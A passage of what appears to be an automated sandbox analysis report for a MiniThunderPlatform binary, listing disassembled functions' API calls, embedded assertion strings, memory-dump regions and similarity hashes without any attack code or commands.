                                                                                                                                                • Part of subcall function 10049060: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(set_recv_buffer,00000000,?,?,?,?,?,?,?,?,?,?,00000000,102444DC,000000FF,10031963), ref: 100490B8
                                                                                                                                                • Part of subcall function 10049060: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100490CC
                                                                                                                                                • Part of subcall function 10049060: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000000), ref: 100490FE
                                                                                                                                                • Part of subcall function 10049060: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1004910C
                                                                                                                                                • Part of subcall function 10049060: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(recv_buffer_size), ref: 1004911B
                                                                                                                                                • Part of subcall function 10049060: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(socket), ref: 1004912F
                                                                                                                                                • Part of subcall function 10049060: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00002000), ref: 10049160
                                                                                                                                                • Part of subcall function 10049060: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1004916E
                                                                                                                                              Strings
                                                                                                                                              • asyn accept request error, xrefs: 1004930F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??1?$basic_string@$ErrorExceptionLastThrow$Acceptmallocsetsockoptsocket
                                                                                                                                              • String ID: asyn accept request error
                                                                                                                                              • API String ID: 2712593612-1481883526
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 10075A7B
                                                                                                                                              • __RTDynamicCast.MSVCR71(?,00000000,103008C4,103008E4,00000000), ref: 10075A99
                                                                                                                                                • Part of subcall function 10075B3E: __EH_prolog.LIBCMT ref: 10075B43
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              • _command_ptr == NULL, xrefs: 10075AD5
                                                                                                                                              • d:\minidownloadlib\branches\branch_wbf\p2sp\sim_class\../com_class/CCommand.h, xrefs: 10075ACB
                                                                                                                                              • thunder_assert, xrefs: 10075AD0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@H_prolog$??0?$basic_string@$CastDynamicV01@@
                                                                                                                                              • String ID: _command_ptr == NULL$d:\minidownloadlib\branches\branch_wbf\p2sp\sim_class\../com_class/CCommand.h$thunder_assert
                                                                                                                                              • API String ID: 476892423-1935395585
                                                                                                                                              APIs
                                                                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 1003CCC8
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 1003CD62
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@CriticalSection$EnterH_prologLeaveV01@@
                                                                                                                                              • String ID: .\connect_manager.cpp$NULL$thunder_assert
                                                                                                                                              • API String ID: 673916969-3610350842
                                                                                                                                              APIs
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(?,?,?,?,?,?,10243168,000000FF), ref: 1003D233
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?,?,10243168,000000FF), ref: 1003D26B
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$??3@H_prologV01@@
                                                                                                                                              • String ID: .\asyn_io_operation.cpp$_is_pending == false$thunder_assert
                                                                                                                                              • API String ID: 1027865869-2628544267
                                                                                                                                              APIs
                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,0000001C,00000400), ref: 1002BEBF
                                                                                                                                              • GetLastError.KERNEL32(00000000), ref: 1002BECA
                                                                                                                                                • Part of subcall function 1000F130: _ultoa.MSVCR71 ref: 1000F157
                                                                                                                                                • Part of subcall function 1000F130: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 1000F167
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 1002BEF4
                                                                                                                                                • Part of subcall function 100013D0: __EH_prolog.LIBCMT ref: 100013D5
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100013E8
                                                                                                                                                • Part of subcall function 100013D0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100013F9
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 10001403
                                                                                                                                                • Part of subcall function 100013D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10001413
                                                                                                                                                • Part of subcall function 1002BD70: ??0exception@@QAE@XZ.MSVCR71(?,?,00000000,102423C9,000000FF,1021B19D,00000000,?,10056267), ref: 1002BD8D
                                                                                                                                                • Part of subcall function 1002BD70: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1002BDA9
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B6AA0), ref: 1002BF2D
                                                                                                                                              Strings
                                                                                                                                              • MultiByteToWideChar call error, code:, xrefs: 1002BEE0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$V01@@$??0exception@@??1?$basic_string@?append@?$basic_string@ByteCharErrorExceptionH_prologLastMultiThrowV12@V12@@Wide_ultoa
                                                                                                                                              • String ID: MultiByteToWideChar call error, code:
                                                                                                                                              APIs
                                                                                                                                              • recvfrom.WS2_32 ref: 10054B17
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?), ref: 10054C7E
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10054CA6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$recvfrom
                                                                                                                                              • String ID:
                                                                                                                                              APIs
                                                                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 00422C56
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00422C7F
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00422CA8
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00422CD1
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00422CFA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseHandle$FileUnmapView
                                                                                                                                              • String ID:
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 10001BF3
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 10001C06
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 10001C1B
                                                                                                                                                • Part of subcall function 1001580D: __EH_prolog.LIBCMT ref: 10015812
                                                                                                                                                • Part of subcall function 1001580D: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,?,00000000), ref: 10015858
                                                                                                                                                • Part of subcall function 1001580D: RtlLeaveCriticalSection.NTDLL(?), ref: 10015881
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000,00000000,?), ref: 10001C3F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10001C4C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@H_prolog$CriticalLeaveSection
                                                                                                                                              • String ID:
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 10001B6A
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 10001B7D
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 10001B92
                                                                                                                                                • Part of subcall function 10015899: __EH_prolog.LIBCMT ref: 1001589E
                                                                                                                                                • Part of subcall function 10015899: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,?,00000000), ref: 100158E4
                                                                                                                                                • Part of subcall function 10015899: RtlLeaveCriticalSection.NTDLL(?), ref: 10015910
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000,00000000,?), ref: 10001BB6
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10001BC3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@H_prolog$CriticalLeaveSection
                                                                                                                                              • String ID:
                                                                                                                                              APIs
                                                                                                                                              • AtlComPtrAssign.ATL71(?,00000000), ref: 10046F05
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Assign
                                                                                                                                              • String ID: .\AsynSSLSocket.cpp$false$thunder_assert
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 10011347: wcslen.MSVCR71(10311990,00000000,?,00000104), ref: 10011372
                                                                                                                                                • Part of subcall function 10011347: GetPrivateProfileStringW.KERNEL32(data,path,102780C0,10311990,00000208,?), ref: 100113C6
                                                                                                                                                • Part of subcall function 10011347: wcslen.MSVCR71(10311990), ref: 100113CD
                                                                                                                                              • wcscmp.MSVCR71(?,%INSTALLPATH%,?,7C3869BF), ref: 100118AE
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: wcslen$PrivateProfileStringwcscmp
                                                                                                                                              • String ID: %INSTALLPATH%$Mini_downloadlib\$userdata\
                                                                                                                                              APIs
                                                                                                                                              • wcscmp.MSVCR71(?,MODEM,0000053C,0000053C,00000000), ref: 004373B3
                                                                                                                                              • ??4?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z.MSVCP71(?), ref: 004373E0
                                                                                                                                              • ??4?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z.MSVCP71(?), ref: 00437406
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??4?$basic_string@_U?$char_traits@_V01@V?$allocator@_W@2@@std@@W@std@@$wcscmp
                                                                                                                                              • String ID: MODEM
                                                                                                                                              APIs
                                                                                                                                              • __RTDynamicCast.MSVCR71(?,00000000,103008C4,103008E4,00000000,?,?,?,?,102495F8,000000FF), ref: 100899BD
                                                                                                                                                • Part of subcall function 10075B3E: __EH_prolog.LIBCMT ref: 10075B43
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              • _command_ptr == NULL, xrefs: 10089A0E
                                                                                                                                              • d:\minidownloadlib\branches\branch_wbf\p2sp\sim_class\../com_class/CCommand.h, xrefs: 10089A04
                                                                                                                                              • thunder_assert, xrefs: 10089A09
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@H_prolog$CastDynamicV01@@
                                                                                                                                              • String ID: _command_ptr == NULL$d:\minidownloadlib\branches\branch_wbf\p2sp\sim_class\../com_class/CCommand.h$thunder_assert
                                                                                                                                              APIs
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00423114
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71 ref: 00423126
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00423159
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
